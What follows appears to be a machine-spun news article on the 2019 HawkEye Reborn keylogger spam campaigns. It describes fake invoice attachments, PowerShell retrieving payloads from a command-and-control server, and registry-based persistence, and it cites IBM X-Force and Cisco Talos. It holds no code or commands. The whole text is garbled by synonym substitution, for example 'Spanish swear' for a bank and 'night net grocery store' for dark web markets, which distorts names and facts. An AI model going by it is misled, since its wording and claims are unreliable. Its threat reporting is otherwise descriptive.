HawkEye press in April and May The malspam take the field that circulate the keylogger actively target area stage business exploiter in dictate to buy accounting credentials and tender datum which can be use as start out of conduct on chronicle or compromise approach on business sector email . In April or May , junk e-mail electronic mail were masked by attacker on Spam server in Estonia as subject matter from Spanish swear or legitimize troupe , parcel out both HawkEye Reborn v8.0 and HawkEye Reborn v9.0 . “ HawkEye is design to plume septic twist of info , but besides can be utilise as a lumper to purchase its electronic network . During April and May , a malicious movement was plunge to aim stage business drug user exploitation virile Spam email aim at brass in legion sphere , such as enthral and logistics , healthcare , implication and export , commercialise , agribusiness , and to a greater extent . While the Spam E - ring armor utilize generic wine salutation and sport badly schoolbook and substance and did not contain any accompany logotype , “ the spammer deliver the goods in staining the speech they had direct from the area of a John Roy Major trust . ” Spam einsteinium - chain armour total with fond regard with faux sell invoice that will dangle HawkEye malware in the background signal when the victim undefendable it .
sample malspam e-mail The IBM X - violence analysis excuse that “ sample we check off attain substance abuser in Spain , the US and the United Arab Emirates for HawkEye Reborn v.9 . The IBM X - force play research worker as well see that “ the second base subscriber line in the handwriting usher a charge holler AAHEP.txt . A mshta.exe binary overlook by PhotoViewer when the victim effort to open the postiche account will utilisation PowerShell to plug in to the command - and - mastery ( C2 ) server and drip additional warhead of malware to taint the dupe with the keylogger / thief malware . This filing cabinet carry all the requisite book of instructions regard the actual Hawkeye keylogger use and program line . ” The malware benefit perseveration on the compromise arrangement by practice an AutoIt playscript in the build of an executable name gvg.exe that add itself to the Windows Registry as an AutoRun ingress , so check that it is automatically relaunched after each system resume .
together with the fact that both take the field feature rattling interchangeable form of onset with netmail unload malware payload masked as commercial message bill infect aim with an information - stealing Trojan , X - thrust investigator have contribute them to think that they are operate on by the Saami scourge doer . contagion appendage Malspam campaign power by HawkEye In the April and May 2019 inclination of compromise index number , X - force researcher determine another malspam hunting expedition from the Turkish host “ between 11 February 2019 and 3 March 2019 , ” with the IP come up to of that Sami Class C net . During April , Cisco Talos besides observe other malspam agitate disperse the Hawkeye keylogger , adenine intimately as My Online Security during May , with the latter comment that the data was either exfiltrated to the server of another keylogger mention Spytector or that the assailant apply a compromise Spytector e-mail to accumulate the slip datum .
Hawkeye is being sold on night net grocery store and chop forum by its maturation team and is presently being dish out by resellers after vary possessor in December 2018 . HawkEye Reborn v9 , the latest translation of the malware outfit , can gather up data through protocol such as FTP , HTTP , and SMTP from respective covering that it and so send to its wheeler dealer . electronic mail station by the Hawkeye Keylogger to its hustler The HawkEye Reborn v9 malware kit up Since about 2013 , the HawkEye keylogger and data thief malware kit has been in ontogeny with a multitude of raw lineament and module impart over the class by its developer to hike their monitoring and information thievery potentiality .
HawkEye Reborn UI “ Holocene modify in HawkEye Reborn Keylogger / Stealer ’s ownership and evolution crusade present that this is a menace that will keep to feel ongoing growth and melioration act frontwards , ” Cisco Talos ‘ enquiry team aforementioned in its depth psychology of HawkEye Reborn v9 keylogger / Stealer . “ HawkEye has been active throughout the menace landscape for a recollective clip and is likely to stay on to be leverage in the future type A recollective as this kit out developer can monetize their travail . ”